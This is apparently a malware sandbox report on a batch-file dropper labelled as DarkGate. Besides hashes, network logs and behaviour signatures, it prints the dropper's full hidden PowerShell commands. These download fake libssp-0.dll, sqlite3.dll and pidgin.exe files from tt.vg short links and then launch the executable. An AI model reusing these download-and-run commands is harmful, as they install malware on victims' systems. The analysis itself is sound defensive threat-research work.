Overview

overview

10

Static

static

10

exe/crypte...te.bat

windows10-1703-x64

10

exe/crypte...er.vbs

windows10-1703-x64

10

exe/crypte...-0.dll

windows10-1703-x64

1

exe/crypte...e3.exe

windows10-1703-x64

3

exe/crypte...-0.dll

windows10-1703-x64

3

exe/crypte...in.exe

windows10-1703-x64

10

exe/crypte...e3.dll

windows10-1703-x64

1

libssp-0.dll

windows10-1703-x64

3

pidgin.exe

windows10-1703-x64

10

sqlite3.dll

windows10-1703-x64

1

exe/non cr...x.html

windows10-1703-x64

4

exe/non cr...ed.exe

windows10-1703-x64

10

exe/non cr...x.html

windows10-1703-x64

4

Resubmissions

25-08-2024 09:52

240825-lwb7jsxgmh 10

22-08-2024 07:27

240822-h98wwsvdrh 10

22-08-2024 07:21

240822-h651tsxhrk 10

21-08-2024 20:21

240821-y44b8aydje 10

Analysis

  • max time kernel
    16s
  • max time network
    18s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    21-08-2024 20:21

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    exe/crypted/Dakrgate 5864 startup plus rootkit/Batch file for 5864v dll crypted darkgate/update.bat

  • Size

    6KB

  • MD5

    97b7c88a02b2a5214d742b7ed50f4544

  • SHA1

    15bf7dd44049b94db1a82504802ead45f6186fa0

  • SHA256

    20c3a5b1c87627e9e016494b806273230f5023cf12d2c0e29eceecb7b8a6d3b6

  • SHA512

    918c856e61d8b348a705227ec381a8101481ec3aaa4a1f6545b9706ebf491d311cfe716f62ab04c796333bae5df857fc67cac86760be1c67578ca1031a906b25

  • SSDEEP

    192:GqNFRmxkyzz06ETWtd4pTunJ8ccJkBhKhgQ:Vp2kgzSTWsu6hJEhKht

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
1
&{$wc = new-object system.net.webclient, $wc.downloadfile("https://tt.vg/download-update-dll1", "C:\\Users\\Admin\\AppData\\Local\\Temp\\libssp-0.dll"), $wc.downloadfile("https://tt.vg/dlldownload2sqliuit-download", "C:\\Users\\Admin\\AppData\\Local\\Temp\\sqlite3.dll"), $wc.downloadfile("https://tt.vg/download-latest-update", "C:\\Users\\Admin\\AppData\\Local\\Temp\\pidgin.exe")}
2
URLs
exe.dropper

https://tt.vg/download-update-dll1
exe.dropper

https://tt.vg/dlldownload2sqliuit-download
exe.dropper

https://tt.vg/download-latest-update

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\exe\crypted\Dakrgate 5864 startup plus rootkit\Batch file for 5864v dll crypted darkgate\update.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2812
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -WindowStyle Hidden -Command "& {$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://tt.vg/download-update-dll1', 'C:\Users\Admin\AppData\Local\Temp\libssp-0.dll'); $wc.DownloadFile('https://tt.vg/dlldownload2sqliuit-download', 'C:\Users\Admin\AppData\Local\Temp\sqlite3.dll'); $wc.DownloadFile('https://tt.vg/download-latest-update', 'C:\Users\Admin\AppData\Local\Temp\pidgin.exe')}"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3644
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -WindowStyle Hidden -Command "& {Start-Process 'C:\Users\Admin\AppData\Local\Temp\pidgin.exe' -WindowStyle Hidden}"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      PID:1604

Network

  • flag-us
    DNS
    tt.vg
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    tt.vg
    IN A
    Response
    tt.vg
    IN A
    104.21.70.180
    tt.vg
    IN A
    172.67.138.42
  • flag-us
    GET
    https://tt.vg/download-update-dll1
    powershell.exe
    Remote address:
    104.21.70.180:443
    Request
    GET /download-update-dll1 HTTP/1.1
    Host: tt.vg
    Connection: Keep-Alive
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Wed, 21 Aug 2024 20:21:55 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=dul5kemnkodf002ot2g98f74nm; path=/
    Set-Cookie: short_62777=1; expires=Wed, 21-Aug-2024 20:36:55 GMT; Max-Age=900; path=/; HttpOnly
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    location: https://s.id/libsdll1-update-new
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f1NML9Qi8ktl%2FBs0oCtU7OkNj2FhAPBcIgr6lsmek70UwHS2g06CCkRTuBAfp9zZZnRIxgYE2F4tcp2TP207PTPy7k%2BlI9k8reoGFcc6y%2BHNcx%2B5vKC2Dg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8b6d550d0d819563-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    GET
    https://tt.vg/dlldownload2sqliuit-download
    powershell.exe
    Remote address:
    104.21.70.180:443
    Request
    GET /dlldownload2sqliuit-download HTTP/1.1
    Host: tt.vg
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Wed, 21 Aug 2024 20:21:58 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=ek7p5mfg50ih01q01vdiedo86h; path=/
    Set-Cookie: short_62778=1; expires=Wed, 21-Aug-2024 20:36:58 GMT; Max-Age=900; path=/; HttpOnly
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    location: https://s.id/sqitdll2-update-new
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9fsFPHaF9Mbk3aqPOa701HPM%2Bui23%2FSmPj%2F8KoawxaXOdFDVeXnw78z9Gn4wL3bTPDmahtB6589jf3bBDQTkewiniIoNMEH0Gq3lC3Qom7OFQ%2BO8MzjfFg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8b6d551b3e609563-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    GET
    https://tt.vg/download-latest-update
    powershell.exe
    Remote address:
    104.21.70.180:443
    Request
    GET /download-latest-update HTTP/1.1
    Host: tt.vg
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Wed, 21 Aug 2024 20:22:00 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=0abdq5oa4nhgpdrs7man5ggvr0; path=/
    Set-Cookie: short_56843=1; expires=Wed, 21-Aug-2024 20:37:00 GMT; Max-Age=900; path=/; HttpOnly
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    location: https://s.id/new-updatepidgin-latest
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6w1wvFc89y%2BIhN%2Bqc4Ja8hVZElXAb%2Bmp%2BroZxO9sW4QzzPt7otFtEggLk0eX%2FvPFtqq4hfX0TXXrAfOaZakQsGir2WmRn4nBU%2B3FnPZd6hhJ399hLmGucA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8b6d55290fab9563-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa
    Remote address:
    8.8.8.8:53
    Request
    0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa
    IN PTR
    Response
  • flag-us
    DNS
    180.70.21.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    180.70.21.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    s.id
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    s.id
    IN A
    Response
    s.id
    IN A
    193.84.85.178
  • flag-hk
    GET
    https://s.id/libsdll1-update-new
    powershell.exe
    Remote address:
    193.84.85.178:443
    Request
    GET /libsdll1-update-new HTTP/1.1
    Host: s.id
    Connection: Keep-Alive
    Response
    HTTP/1.1 403 Forbidden
    Server: nginx
    Date: Wed, 21 Aug 2024 20:21:57 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 10288
    Connection: keep-alive
    Vary: Accept-Encoding
    X-Robots-Tag: noindex
    Cache-Control: private, max-age=3
    Strict-Transport-Security: max-age=15724800; includeSubDomains
  • flag-us
    DNS
    178.85.84.193.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    178.85.84.193.in-addr.arpa
    IN PTR
    Response
  • flag-hk
    GET
    https://s.id/sqitdll2-update-new
    powershell.exe
    Remote address:
    193.84.85.178:443
    Request
    GET /sqitdll2-update-new HTTP/1.1
    Host: s.id
    Response
    HTTP/1.1 403 Forbidden
    Server: nginx
    Date: Wed, 21 Aug 2024 20:21:59 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 10288
    Connection: keep-alive
    Vary: Accept-Encoding
    X-Robots-Tag: noindex
    Cache-Control: private, max-age=3
    Strict-Transport-Security: max-age=15724800; includeSubDomains
  • flag-hk
    GET
    https://s.id/new-updatepidgin-latest
    powershell.exe
    Remote address:
    193.84.85.178:443
    Request
    GET /new-updatepidgin-latest HTTP/1.1
    Host: s.id
    Response
    HTTP/1.1 403 Forbidden
    Server: nginx
    Date: Wed, 21 Aug 2024 20:22:03 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 10288
    Connection: keep-alive
    Vary: Accept-Encoding
    X-Robots-Tag: noindex
    Cache-Control: private, max-age=3
    Strict-Transport-Security: max-age=15724800; includeSubDomains
  • 104.21.70.180:443
    https://tt.vg/download-latest-update
    tls, http
    powershell.exe
    1.1kB
     6.2kB
     12
    11

    HTTP Request

    GET https://tt.vg/download-update-dll1

    HTTP Response

    301

    HTTP Request

    GET https://tt.vg/dlldownload2sqliuit-download

    HTTP Response

    301

    HTTP Request

    GET https://tt.vg/download-latest-update

    HTTP Response

    301
  • 193.84.85.178:443
    https://s.id/libsdll1-update-new
    tls, http
    powershell.exe
    1.1kB
     16.3kB
     17
    22

    HTTP Request

    GET https://s.id/libsdll1-update-new

    HTTP Response

    403
  • 193.84.85.178:443
    https://s.id/sqitdll2-update-new
    tls, http
    powershell.exe
    1.1kB
     16.5kB
     16
    21

    HTTP Request

    GET https://s.id/sqitdll2-update-new

    HTTP Response

    403
  • 193.84.85.178:443
    https://s.id/new-updatepidgin-latest
    tls, http
    powershell.exe
    1.3kB
     15.1kB
     17
    20

    HTTP Request

    GET https://s.id/new-updatepidgin-latest

    HTTP Response

    403
  • 8.8.8.8:53
    tt.vg
    dns
    powershell.exe
    51 B
     83 B
     1
    1

    DNS Request

    tt.vg

    DNS Response

    104.21.70.180
    172.67.138.42

  • 8.8.8.8:53
    0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa
    dns
    118 B
     182 B
     1
    1

    DNS Request

    0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa

  • 8.8.8.8:53
    180.70.21.104.in-addr.arpa
    dns
    72 B
     134 B
     1
    1

    DNS Request

    180.70.21.104.in-addr.arpa

  • 8.8.8.8:53
    s.id
    dns
    powershell.exe
    50 B
     66 B
     1
    1

    DNS Request

    s.id

    DNS Response

    193.84.85.178

  • 8.8.8.8:53
    178.85.84.193.in-addr.arpa
    dns
    72 B
     132 B
     1
    1

    DNS Request

    178.85.84.193.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dzwk30aw.iqj.ps1
    Filesize

    1B

    MD5

    c4ca4238a0b923820dcc509a6f75849b

    SHA1

    356a192b7913b04c54574d18c28d46e6395428ab

    SHA256

    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

    SHA512

    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

    Download Submit

  • memory/3644-0-0x00007FFA7ECD3000-0x00007FFA7ECD4000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3644-5-0x0000020F43FB0000-0x0000020F43FD2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3644-7-0x00007FFA7ECD0000-0x00007FFA7F6BC000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/3644-9-0x0000020F5C740000-0x0000020F5C7B6000-memory.dmp

    Filesize

    472KB

    Download

  • memory/3644-10-0x00007FFA7ECD0000-0x00007FFA7F6BC000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/3644-26-0x00007FFA7ECD0000-0x00007FFA7F6BC000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/3644-43-0x00007FFA7ECD3000-0x00007FFA7ECD4000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3644-44-0x00007FFA7ECD0000-0x00007FFA7F6BC000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/3644-56-0x00007FFA7ECD0000-0x00007FFA7F6BC000-memory.dmp

    Filesize

    9.9MB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.